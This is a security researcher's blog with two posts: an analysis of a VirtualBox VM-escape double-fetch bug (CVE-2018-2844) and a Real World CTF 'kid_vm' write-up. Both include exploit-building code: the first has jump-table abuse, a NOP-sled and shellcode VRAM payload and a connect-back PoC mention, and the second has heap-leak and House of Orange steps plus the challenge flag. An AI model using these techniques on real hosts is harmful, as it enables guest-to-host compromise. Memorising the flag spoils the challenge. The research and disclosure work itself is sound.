Tuesday, August 28, 2018

From Compiler Optimization to Code Execution - VirtualBox VM Escape - CVE-2018-2844

Oracle fixed some of the issues I reported in VirtualBox in the Oracle Critical Patch Update - April 2018 [5]. CVE-2018-2844 was an interesting double fetch vulnerability in the VirtualBox Video Acceleration (VBVA) feature affecting Linux hosts. The VBVA feature works on top of the VirtualBox Host-Guest Shared Memory Interface (HGSMI), a shared memory interface implemented using the Video RAM (VRAM) buffer. The VRAM buffer is at physical address 0xE0000000:
sudo lspci -vvv

00:02.0 VGA compatible controller: InnoTek Systemberatung GmbH VirtualBox Graphics Adapter (prog-if 00 [VGA controller])
 ...
 Interrupt: pin A routed to IRQ 10
 Region 0: Memory at e0000000 (32-bit, prefetchable) [size=16M]
 Expansion ROM at  [disabled]
 Kernel modules: vboxvideo
The guest sets up a command buffer in HGSMI with the layout below and writes the buffer's offset within VRAM to the I/O port VGA_PORT_HGSMI_GUEST (0x3d0) to notify the host.
 HGSMIBUFFERHEADER header; 
 uint8_t data[header.u32BufferSize]; 
 HGSMIBUFFERTAIL tail;
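As a rough illustration of that layout, the Python sketch below packs a header, payload and tail back to back. The field layout (a 32-bit data size followed by flags, channel, channel info and 8 opaque bytes, then an 8-byte tail holding a checksum) is an assumption modeled on VirtualBox's HGSMI headers rather than something shown in this post, the checksum is simply supplied by the caller, and `build_hgsmi_buffer` is a hypothetical helper.

```python
import struct

# ASSUMED layout, modeled on VirtualBox's HGSMI headers (verify against source):
#   header: u32 data size (u32BufferSize above), u8 flags, u8 channel,
#           u16 channel info, 8 opaque bytes
#   tail:   u32 reserved, u32 checksum
HEADER_FMT = "<IBBH8s"
TAIL_FMT = "<II"
HEADER_SIZE = struct.calcsize(HEADER_FMT)  # 16 bytes
TAIL_SIZE = struct.calcsize(TAIL_FMT)      # 8 bytes


def build_hgsmi_buffer(data: bytes, channel: int, channel_info: int,
                       flags: int = 0, checksum: int = 0) -> bytes:
    """Lay out header | data | tail contiguously, as the guest does in VRAM.

    The checksum is passed in by the caller; how the host computes or
    verifies it is not modeled here.
    """
    header = struct.pack(HEADER_FMT, len(data), flags, channel,
                         channel_info, bytes(8))
    tail = struct.pack(TAIL_FMT, 0, checksum)
    return header + data + tail


# Hypothetical channel values; the guest would then write the VRAM offset of
# this buffer to I/O port 0x3d0 (VGA_PORT_HGSMI_GUEST).
buf = build_hgsmi_buffer(b"A" * 32, channel=1, channel_info=0)
print(len(buf), struct.unpack_from("<I", buf, 0)[0])
```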
The bug occurs in the code that handles Video DMA (VDMA) commands passed from the guest to the host. The VDMA command handler vboxVDMACmdExec() dispatches to specific functions based on the VDMA command type, implemented as a switch statement:
static int
vboxVDMACmdExec(PVBOXVDMAHOST pVdma, const uint8_t *pvBuffer, uint32_t cbBuffer)
{
 /* pvBuffer is shared memory in VRAM */
        PVBOXVDMACMD pCmd = (PVBOXVDMACMD)pvBuffer;

        switch (pCmd->enmType) {
                case VBOXVDMACMD_TYPE_CHROMIUM_CMD: {
                        ...
                }
                case VBOXVDMACMD_TYPE_DMA_PRESENT_BLT: {
                        ...
                }
                case VBOXVDMACMD_TYPE_DMA_BPB_TRANSFER: {
                        ...
                }
                case VBOXVDMACMD_TYPE_DMA_NOP: {
                        ...
                }
                case VBOXVDMACMD_TYPE_CHILD_STATUS_IRQ: {
                        ...
                }
                default: {
                         ...
                }
        }
}
The compiler turns the switch statement into a jump table. This is what it looks like after optimization:
; first fetch happens for cmp
.text:00000000000B957A                 cmp     dword ptr [r12], 0Ah ; switch 11 cases
.text:00000000000B957F                 ja      VBOXVDMACMD_TYPE_DEFAULT ; jumptable 00000000000B9597 default case

; second fetch again for pCmd->enmType from shared memory
.text:00000000000B9585                 mov     eax, [r12]
.text:00000000000B9589                 lea     rbx, vboxVDMACmdExec_JMPS
.text:00000000000B9590                 movsxd  rax, dword ptr [rbx+rax*4]
.text:00000000000B9594                 add     rax, rbx
.text:00000000000B9597                 jmp     rax             ; switch jump
.rodata:0000000000185538 vboxVDMACmdExec_JMPS dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                                         ; DATA XREF: vboxVDMACommand+1D9o
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_PRESENT_BLT - 185538h ; jump table for switch statement
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_BPB_TRANSFER - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_NOP - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_NOP - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DEFAULT - 185538h
.rodata:0000000000185538                 dd offset VBOXVDMACMD_TYPE_DMA_NOP - 185538h
.rodata:0000000000185564                 align 20h
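Each table entry is a 32-bit offset relative to the table itself, so the dispatch computes `table + sign_extend(table[type])`. The minimal Python model of those instructions below, using a hypothetical case address, shows why `movsxd` matters: the case bodies live below the table at 0x185538, so their entries are negative. `entry_address` and `jump_target` are illustrative names, not VirtualBox code.

```python
import struct

MASK64 = (1 << 64) - 1


def entry_address(table_base: int, index: int) -> int:
    """Address read by `movsxd rax, dword ptr [rbx+rax*4]`.

    `mov eax, [r12]` zero-extends the 32-bit type into rax, so the index is
    treated as unsigned and can only move forward from the table base.
    """
    return (table_base + 4 * (index & 0xFFFFFFFF)) & MASK64


def jump_target(table_base: int, entry: int) -> int:
    """Target of `movsxd ...; add rax, rbx; jmp rax`.

    The 32-bit entry is sign-extended before being added to the table base,
    which is how targets located below the table are encoded.
    """
    offset = struct.unpack("<i", struct.pack("<I", entry & 0xFFFFFFFF))[0]
    return (table_base + offset) & MASK64


TABLE = 0x185538          # vboxVDMACmdExec_JMPS in the listing above
CASE = 0xB9600            # hypothetical address of one case body
raw = (CASE - TABLE) & 0xFFFFFFFF   # what "dd offset CASE - 185538h" stores
print(hex(raw), hex(jump_target(TABLE, raw)))
```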
The issue is quite clear: it's a TOCTOU bug. Since the variable is not marked volatile, GCC's optimizations resulted in a double fetch from shared VRAM: the first fetch is used for the bounds check and the second one to index the jump table. I didn't see this optimization in VirtualBox for Windows and OS X; only Linux hosts are affected.
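The race can be modeled deterministically. In this hypothetical sketch, `RacyWord` stands in for `pCmd->enmType` in VRAM and returns a different value on each read, as if a second vCPU rewrote it between the host's two fetches. The single-fetch variant is shown only for contrast; it is not necessarily how Oracle fixed the bug.

```python
NUM_CASES = 11  # cmp dword ptr [r12], 0Ah ; ja default  -> valid types 0..10


class RacyWord:
    """Hypothetical model of pCmd->enmType in guest-writable VRAM.

    Each read() returns the next value in `values` (the last one repeats),
    standing in for a second vCPU rewriting the field between host fetches.
    """

    def __init__(self, *values: int):
        self._values = list(values)
        self.reads = 0

    def read(self) -> int:
        value = self._values[min(self.reads, len(self._values) - 1)]
        self.reads += 1
        return value


def dispatch_double_fetch(word: RacyWord):
    """What the optimized Linux build effectively does."""
    if word.read() > NUM_CASES - 1:   # first fetch: bounds check
        return "default"
    return word.read()                # second fetch: used as the table index


def dispatch_single_fetch(word: RacyWord):
    """Contrast: fetch once into a local, then check and use the copy."""
    cmd_type = word.read()
    if cmd_type > NUM_CASES - 1:
        return "default"
    return cmd_type


print(hex(dispatch_double_fetch(RacyWord(0xA, 0xDEADBEEF))))  # unchecked index
print(dispatch_single_fetch(RacyWord(0xA, 0xDEADBEEF)))        # stays 10
```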

Note that this kind of issue is not new. Felix Wilhelm's prior research, Xenpwn - Breaking Paravirtualized Devices [1], covers similar issues found in Xen.

Exploitation:

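Though the race window is very small, it can be won reliably on guests with more than one vCPU, where one vCPU submits the command while another rewrites pCmd->enmType between the two fetches. Below is the register state at the crash, with RAX holding the guest-supplied value 0xdeadbeef: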
 RAX  0xdeadbeef
 RBX  0x7fff8abf2538 ◂— rol    byte ptr [rdx - 0xd], 1
 RCX  0x7fff9c508ac0 —▸ 0x7ffff7e30000 ◂— 0x5
 RDX  0xe7b
 RDI  0xeeb
 RSI  0x7fffdc022000 ◂— xor    byte ptr [rax], al /* 0xffe40030; '0' */
 R8   0x7fff89d20000 ◂— jmp    0x7fff89d20010 /* 0xb020000000eeb */
 R9   0x7fff8ab06040 ◂— push   rbp
 R10  0x7fff9c50ad48 ◂— 0x1 
 R11  0x7fff9c508d48 ◂— 0x0
 R12  0x7fff89d20078 ◂— 0xa /* '\n' */ 
 R13  0xf3b
 R14  0x7fff9c50d0e0 —▸ 0x7fff9c508ac0 —▸ 0x7ffff7e30000 ◂— 0x5
 R15  0x7fff89d20030 ◂— 0xffffffdc0f3b0eeb
 RBP  0x7fffba44dc40 —▸ 0x7fffba44dca0 —▸ 0x7fffba44dce0 —▸ 0x7fffba44dd00 —▸ 0x7fffba44dd50 ◂— ...
 RSP  0x7fffba44db80 —▸ 0x7fffba44dbb0 —▸ 0x7fff9c508ac0 —▸ 0x7ffff7e30000 ◂— 0x5
 RIP  0x7fff8ab26590 ◂— movsxd rax, dword ptr [rbx + rax*4]


 ► 0x7fff8ab26590    movsxd rax, dword ptr [rbx + rax*4]
   0x7fff8ab26594    add    rax, rbx
   0x7fff8ab26597    jmp    rax
RAX is controlled by the guest. R8, R12 and R15 point into the HGSMI buffer at the time of the crash. The jump table uses relative addressing, hence one cannot directly jump to an arbitrary pointer. My first plan was to find a feature that allows the guest to write a controlled value into VBoxDD.so's memory and then use it as a fake jump table. However, I failed to find one.

The next option is to jump directly into the VRAM buffer, which is mapped with RWX permissions, using whatever value is already available to serve as a fake jump table entry:
    // VRAM buffer
    0x7fff88d21000     0x7fff89d21000 rwxp  1000000 0

    
    // VBoxDD.so
    0x7fff8aa6d000     0x7fff8adff000 r-xp   392000 0      /usr/lib/virtualbox/VBoxDD.so
    0x7fff8adff000     0x7fff8afff000 ---p   200000 392000 /usr/lib/virtualbox/VBoxDD.so
    0x7fff8afff000     0x7fff8b010000 r--p    11000 392000 /usr/lib/virtualbox/VBoxDD.so
    0x7fff8b010000     0x7fff8b018000 rw-p     8000 3a3000 /usr/lib/virtualbox/VBoxDD.so
Find a value in VBoxDD.so (treated as an entry of a fake jump table) which, after the relative address calculation, points into the 16 MB shared VRAM buffer. For the proof-of-concept exploit, fill the entire VRAM with NOPs and place the shellcode in the final pages of the mapping. No ASLR bypass is needed since the jump is relative.
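The search for a usable fake entry and the payload layout can be sketched in Python. This is a hypothetical helper, not the author's exploit: `find_fake_index` scans a dump of readable library memory for a slot whose signed 32-bit value, added to the table base, lands inside VRAM, and `build_vram_payload` fills the buffer with NOPs and puts the shellcode at the end. The demo runs on synthetic data.

```python
import struct


def find_fake_index(blob: bytes, blob_base: int, table_base: int,
                    vram_start: int, vram_end: int):
    """Find an index whose 'jump table entry' sends execution into VRAM.

    blob: dump of contiguous readable memory mapped at blob_base
          (e.g. part of VBoxDD.so; the ---p gap would fault).
    The host reads entry = *(int32 *)(table_base + 4 * index) and jumps to
    table_base + entry. The index is zero-extended, so only slots at or after
    table_base are reachable. Returns (index, target) or None.
    """
    start = table_base - blob_base
    if start < 0:
        raise ValueError("table_base must lie inside the dump")
    for off in range(start, len(blob) - 3, 4):
        entry = struct.unpack_from("<i", blob, off)[0]   # movsxd: signed
        target = table_base + entry
        if vram_start <= target < vram_end:
            return (off - start) // 4, target
    return None


def build_vram_payload(size: int, shellcode: bytes) -> bytearray:
    """NOP sled (0x90) across the buffer, shellcode in the final bytes."""
    payload = bytearray(b"\x90" * size)
    payload[size - len(shellcode):] = shellcode
    return payload


# Synthetic demo: a 4 KB "library" at 0x10000 with the table at 0x10100 and a
# "VRAM" window at 0x2000-0x3000; slot 5 happens to hold a usable value.
dump = bytearray(0x1000)
struct.pack_into("<i", dump, 0x100 + 5 * 4, 0x2800 - 0x10100)
print(find_fake_index(bytes(dump), 0x10000, 0x10100, 0x2000, 0x3000))
```

Plugging in the numbers from the debugger output above (RBX = 0x7fff8abf2538, VRAM at 0x7fff88d21000-0x7fff89d21000), a usable entry is any signed 32-bit value in [-0x1ED1538, -0xED1538), i.e. a raw dword from 0xFE12EAC8 up to 0xFF12EAC7.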

In the guest, add vboxvideo to /etc/modprobe.d/blacklist.conf (a "blacklist vboxvideo" line). The vboxvideo.ko driver has a custom allocator that manages VRAM and implements the guest side of HGSMI; blacklisting it reduces activity in VRAM and keeps the payload intact. The exploit was tested with Ubuntu Server 16.04.3 64-bit as the guest and Ubuntu Desktop 16.04.4 64-bit as the host, running VirtualBox 5.2.6.r120293.

The proof-of-concept exploit code, with process continuation and a connect-back over the network, can be found at virtualbox-cve-2018-2844



References:

[1] Xenpwn - Breaking Paravirtualized Devices by Felix Wilhelm
[2] SSD Advisory – Oracle VirtualBox Multiple Guest to Host Escape Vulnerabilities by Niklas Baumstark
[3] VM escape - QEMU Case Study by Mehdi Talbi & Paul Fariello
[4] Xen Security Advisory CVE-2015-8550 / XSA-155
[5] Oracle Critical Patch Update Advisory - April 2018

Saturday, August 11, 2018

Real World CTF - kid_vm

kid_vm is a KVM API based challenge. The provided user space binary uses KVM ioctl calls to set up a guest and execute guest code in 16-bit real mode. The binary comes with the following mitigations:
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
The guest code is copied to a 64 KB region allocated using mmap. The KVM_SET_USER_MEMORY_REGION call then sets up guest memory, with guest physical memory starting at address 0 and backed by the mmap’ed region:
       
        guest_memory = mmap(0, 0x10000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
        if (!guest_memory) {
                perror("Mmap fail");
                return 1;
        }

        /* copy guest code */
        memcpy(guest_memory, guest, sizeof(guest));

        region.slot = 0;
        region.guest_phys_addr = 0;
        region.memory_size = 0x10000;
        region.userspace_addr = (uint64_t) guest_memory;

        if (ioctl(vm, KVM_SET_USER_MEMORY_REGION, &region) == -1) {
The user space code also sets KVM_GUESTDBG_SINGLESTEP, which causes a VM exit (KVM_EXIT_DEBUG) on each step. KVM doesn't seem to notify user space of VM exits caused by vmcall, so single stepping looks like a workaround to detect the vmcall instruction:
        memset(&debug, 0, sizeof(debug));
        debug.control = KVM_GUESTDBG_ENABLE | KVM_GUESTDBG_SINGLESTEP;

        if (ioctl(vcpu, KVM_SET_GUEST_DEBUG, &debug) < 0) {
                perror("Fail");
                return 1;
        }
The next interesting part of the code is the user space VM exit handler:
    switch (run->exit_reason) {

        case KVM_EXIT_IO:
            if (run->io.direction == KVM_EXIT_IO_OUT && run->io.size == 1
                         && run->io.port == 23 && run->io.count == 1) {

                putchar(*((char *)run + run->io.data_offset));
                continue;
            }

            if (run->io.direction == KVM_EXIT_IO_IN && run->io.size == 1
                            && run->io.port == 23 && run->io.count == 1) {

                read(0, ((char *)run + run->io.data_offset), 1);
                continue;
            }

            fwrite("Unhandled IO\n", 1, 0xD, stderr);
            return 1;

        case KVM_EXIT_DEBUG:
            if (ioctl(vcpu, KVM_GET_REGS, &regs) == -1)
                puts("Error get regs!");

            /* check if VMCALL instruction */
            if (guest_memory[regs.rip] == 0xF && guest_memory[regs.rip + 1] == 1
                                        && guest_memory[regs.rip + 2] == 0xC1) {

                if (ioctl(vcpu, KVM_GET_REGS, &regs) == -1)
                    puts("Error get regs!");

                switch (regs.rax) {

                    case 0x101:
                        free_memory(regs.rbx, regs.rcx);
                        break;
                    case 0x102:
                        copy_memory(regs.rbx, regs.rcx, regs.rdx, guest_memory);
                        break;
                    case 0x100:
                        alloc_memory(regs.rbx);
                        break;
                    default:
                        puts("Function error!");
                        break;
                }
           }
           continue;
VM exits caused by port I/O (KVM_EXIT_IO) are handled by reading and writing data over stdin/stdout. Three interesting hypercalls are implemented on top of the KVM_EXIT_DEBUG event.
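The dispatch logic reduces to a byte comparison and a lookup on RAX. Below is a small Python model of it; `on_debug_exit` and the `regs` dict are hypothetical stand-ins for the handler and `struct kvm_regs`, and, like the handler, the model indexes guest memory directly by RIP.

```python
VMCALL = bytes([0x0F, 0x01, 0xC1])   # the byte sequence the handler compares

# Hypercall numbers taken from the switch on regs.rax in the handler above.
HYPERCALLS = {0x100: "alloc_memory", 0x101: "free_memory", 0x102: "copy_memory"}


def is_vmcall(guest_memory: bytes, rip: int) -> bool:
    """True if the bytes at guest_memory[rip] encode VMCALL."""
    return guest_memory[rip:rip + 3] == VMCALL


def on_debug_exit(guest_memory: bytes, regs: dict):
    """Model of the KVM_EXIT_DEBUG path, reached after every single step."""
    if not is_vmcall(guest_memory, regs["rip"]):
        return None                       # ordinary instruction: keep running
    return HYPERCALLS.get(regs["rax"], "Function error!")


mem = bytearray(0x10)
mem[4:7] = VMCALL
print(on_debug_exit(mem, {"rip": 4, "rax": 0x101}))   # free_memory
```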

Host Bugs:

A. The arrays that track host allocations and their sizes can be accessed out of bounds by all three hypercalls (free_memory, copy_memory, alloc_memory). Below is the code from alloc_memory:
     /* index can take the value 16 here when going out of loop */
     for (index = 0; index <= 0xF && allocations[index]; ++index);

     mem = malloc(size);

     if (mem) {
         allocations[index] = mem;        // out of bounds access
         alloca_size[index] = size;       // can overwrite allocations[0]
         ++number_of_allocs;

This bug is less interesting for exploitation, since there is a use-after-free that gives better primitives.

B. The hypercall for freeing memory has an option to free a pointer without clearing the reference. However, the guest code only exposes case 3:
        if (index <= 16) {               // out of bound access

                switch (choice) {

                        case 2:
                                free(allocations[index]);
                                allocations[index] = 0;
                                // can be decremented arbitrary number of times
                                --number_of_allocs;                     
                                break;
                        case 3:
                                free(allocations[index]);
                                allocations[index] = 0;
                                alloca_size[index] = 0;
                                // can be decremented arbitrary number of times
                                --number_of_allocs;                     
                                break;
                        case 1:
                                // double free/UAF as pointer is not set to NULL
                                free(allocations[index]);               
                                break;
                }
        } 
This UAF can be exercised further through the hypercall that copies memory between guest and host:
    if (size <= alloca_size[index]) {
        if (choice == 1) {
            // write to freed memory due to UAF
            memcpy(allocations[index], guest_memory + 0x4000, size);        
        }
        else if (choice == 2) {
            // read from uninitialized or freed memory
            memcpy(guest_memory + 0x4000, allocations[index], size);        
        }
    } 
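Choice 1 is the dangerous combination: it frees the chunk but leaves both `allocations[index]` and `alloca_size[index]` untouched, so the only guard in the copy hypercall (`size <= alloca_size[index]`) still passes. The hypothetical Python model below tracks just that state; `HostAllocTable` and the addresses are made up for illustration.

```python
class HostAllocTable:
    """Hypothetical model of the host's allocations[] / alloca_size[] arrays."""

    def __init__(self, slots: int = 16):
        self.ptr = [None] * slots
        self.size = [0] * slots
        self.freed = set()               # addresses currently owned by malloc

    def alloc(self, index: int, size: int, addr: int) -> None:
        self.freed.discard(addr)
        self.ptr[index], self.size[index] = addr, size

    def free(self, index: int, choice: int) -> None:
        self.freed.add(self.ptr[index])
        if choice in (2, 3):
            self.ptr[index] = None       # reference cleared
        if choice == 3:
            self.size[index] = 0         # recorded size cleared as well
        # choice 1 keeps both the pointer and its recorded size

    def copy_allowed(self, index: int, size: int) -> bool:
        """The only guard in copy_memory: size <= alloca_size[index]."""
        return size <= self.size[index]

    def is_dangling(self, index: int) -> bool:
        return self.ptr[index] is not None and self.ptr[index] in self.freed


table = HostAllocTable()
table.alloc(0, 256, 0x1000)
table.free(0, 1)
print(table.is_dangling(0), table.copy_allowed(0, 256))   # True True
```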
Guest Bug:

Though the host code has a UAF, it cannot be triggered by the guest code that is currently executing. Hence, we need to achieve code execution in the guest before attempting a VM escape. The guest code starts at address 0 and initializes the stack pointer to 0x3000:
seg000:0000                 mov     sp, 3000h
seg000:0003                 call    main
seg000:0006                 hlt
The guest code that allocates memory in the guest looks like this:
seg000:007E                 mov     ax, offset size_value
seg000:0081                 mov     bx, 2           ; get 2 byte size
seg000:0084                 call    inb
seg000:0087                 mov     ax, ds:size_value
seg000:008A                 cmp     ax, 1000h       ; check if size < 0x1000
seg000:008D                 ja      short size_big
seg000:008F                 mov     cx, ds:total_bytes
seg000:0093                 cmp     cx, 0B000h
seg000:0097                 ja      short guest_mem_full
seg000:0099                 mov     si, word ptr ds:nalloc
seg000:009D                 cmp     si, 16          ; check the number of allocations made
seg000:00A0                 jnb     short too_many_allocs
seg000:00A2                 mov     di, cx
; move beyond stack@0x3000 and host shared_mem@0x4000, but this can wrap
seg000:00A4                 add     cx, 5000h       
seg000:00A8                 add     si, si
seg000:00AA                 mov     ds:address_array[si], cx ; save address
seg000:00AE                 mov     ds:size_array[si], ax ; save size
seg000:00B2                 add     di, ax
seg000:00B4                 mov     ds:total_bytes, di
seg000:00B8                 mov     al, ds:nalloc
seg000:00BB                 inc     al
seg000:00BD                 mov     ds:nalloc, al

The guest uses the following memory regions:
text region  @ 0x0
stack bottom @ 0x3000
shared memory @ 0x4000
heap @ 0x5000 – 0x5000+0xB000
The guest memory allocator hands out memory starting at address 0x5000 and refuses new allocations once total_bytes exceeds 0xB000. However, the address computation total_bytes + 0x5000 is a 16-bit addition and can wrap to 0. An allocation at address 0 allows overwriting the guest code with arbitrary code, after which the vulnerable hypercall paths in the host can be triggered from the guest.
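The wrap can be reproduced with a Python model of the allocator that masks every addition to 16 bits. Names such as `guest_alloc` are hypothetical; the constants come from the listing above. Eleven 0x1000-byte allocations bring total_bytes to exactly 0xB000, which still passes the unsigned `ja` check, so the twelfth allocation is placed at address 0.

```python
HEAP_BASE = 0x5000    # first heap address (past stack@0x3000, shared@0x4000)
HEAP_LIMIT = 0xB000   # cmp cx, 0B000h ; ja guest_mem_full
MAX_SIZE = 0x1000     # cmp ax, 1000h  ; ja size_big
MAX_ALLOCS = 16       # cmp si, 16     ; jnb too_many_allocs


def guest_alloc(state: dict, size: int):
    """Mirror of the real-mode allocator, using 16-bit register arithmetic."""
    if size > MAX_SIZE:
        return None
    if state["total_bytes"] > HEAP_LIMIT:   # unsigned compare, so 0xB000 passes
        return None
    if state["nalloc"] >= MAX_ALLOCS:
        return None
    addr = (state["total_bytes"] + HEAP_BASE) & 0xFFFF   # add cx, 5000h
    state["total_bytes"] = (state["total_bytes"] + size) & 0xFFFF
    state["nalloc"] += 1
    return addr


state = {"total_bytes": 0, "nalloc": 0}
addrs = [guest_alloc(state, 0x1000) for _ in range(12)]
print(hex(addrs[10]), hex(addrs[11]))   # 0xf000 0x0
```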

Exploitation:

I didn’t overwrite the entire guest code, but extended its functionality with the following changes, which set bx to a user-supplied value before each vmcall:
seg000:0058 _free_memory:                           ; CODE XREF: main+2A↑j
seg000:0058                 call    get_choice
seg000:005B                 jmp     short loop
seg000:01A3                 call    set_choice
seg000:01A6                 mov     cl, ds:index    ; index
seg000:01AA                 mov     dx, ds:size_value
seg000:01AE                 vmcall
 
seg000:01DF                 mov     ax, 101h        ; free
seg000:01E2                 call    set_choice
seg000:01E5                 mov     cl, ds:index
seg000:01E9                 vmcall
seg000:0386 choice          dw 0                    ; DATA XREF: get_choice+B↓o
seg000:0386                                         ; set_choice↓r
seg000:0388
seg000:0388 get_choice      proc near               ; CODE XREF: main:_free_memory↑p
seg000:0388                 push    ax
seg000:0389                 push    bx
seg000:038A                 mov     ax, (offset aElcomeToTheVir+0B7h) ; 
seg000:038D                 mov     bx, 0Ch
seg000:0390                 call    outb
seg000:0393                 mov     ax, offset choice
seg000:0396                 mov     bx, 1
seg000:0399                 call    inb
seg000:039C                 pop     bx
seg000:039D                 pop     ax
seg000:039E                 retn
seg000:039E get_choice      endp
seg000:039E
seg000:039F set_choice      proc near               ; CODE XREF: update_host_memory+4C↑p
seg000:039F                                         ; free_host_memory+1F↑p
seg000:039F                 mov     bx, ds:choice
seg000:03A3                 retn
seg000:03A3 set_choice      endp
Leaking libc and heap pointers:

Since the freelist pointers of a chunk in the unsorted bin can be read through the UAF, this leaks arena and heap pointers. Allocate 4 chunks, free alternate chunks to prevent coalescing, and read the pointers through the UAF as below:
for x in range(4):
    allocate_host_memory(256)

free_host_memory(0, INVALID_FREE)
free_host_memory(2, VALID_FREE) 

copy_memory(256, 0, 'A'*256, COPY_FROM_HOST)
heap_mem = p.recvn(0x1000)
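The first 16 bytes of the leak can then be split into the two pointers. This sketch assumes glibc without tcache (256-byte chunks would otherwise go to tcache first) and that the leaked buffer (`heap_mem` above) starts at chunk 0's user data. With chunk 0 freed before chunk 2, glibc's unsorted-bin insertion leaves chunk 0's fd pointing at the bin header in main_arena and its bk pointing at chunk 2. `parse_unsorted_leak` is hypothetical, and the arena offset and pointer values used here are made-up examples, since the real offset depends on the exact libc build.

```python
import struct


def parse_unsorted_leak(leak: bytes, arena_offset: int) -> dict:
    """Split the first 16 bytes of a freed chunk's user data into fd / bk.

    fd -> unsorted bin header inside main_arena (a libc address)
    bk -> the next freed chunk (a heap address)
    arena_offset is libc-build specific and must be looked up separately.
    """
    fd, bk = struct.unpack_from("<QQ", leak, 0)
    return {"libc_base": fd - arena_offset, "arena_ptr": fd, "heap_ptr": bk}


# Made-up leak and offset, only to exercise the parser.
fake_leak = struct.pack("<QQ", 0x7F1234567B78, 0x5555557571A0) + b"A" * 240
info = parse_unsorted_leak(fake_leak, arena_offset=0x3C4B78)
print({k: hex(v) for k, v in info.items()})
```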
Getting code execution:

House of Orange works in this situation. Create a large chunk and free it, but hold a reference to the pointer. Later, use this reference to overwrite the top chunk and gain code execution. The flag in rwctf format was WoW_YoU_w1ll_B5_A_FFFutuRe_staR_In_vm_E5c4pe. The exploit for the challenge can be found here
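For reference, the usual first step of House of Orange is to shrink the top chunk's size field while keeping its end page-aligned, so that a later allocation the top chunk cannot satisfy sends the old top into the unsorted bin via sysmalloc(). The post does not show the values it used; `forged_top_size` is a hypothetical helper computing one valid choice under those constraints.

```python
PAGE_SIZE = 0x1000
MINSIZE = 0x20        # smallest chunk size on 64-bit glibc
PREV_INUSE = 0x1


def forged_top_size(top_addr: int) -> int:
    """Shrunken top-chunk size that keeps the top chunk's end page-aligned.

    top_addr is the address of the top chunk header. sysmalloc() accepts an
    old top only if its size is >= MINSIZE, PREV_INUSE is set and
    top_addr + size is page-aligned; a later request the shrunken top cannot
    serve (and below the mmap threshold) then frees the old top.
    """
    remaining = (-top_addr) % PAGE_SIZE
    if remaining < MINSIZE:
        remaining += PAGE_SIZE
    return remaining | PREV_INUSE


print(hex(forged_top_size(0x602400)))   # 0xc01
```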

References: Using the KVM API, House of Orange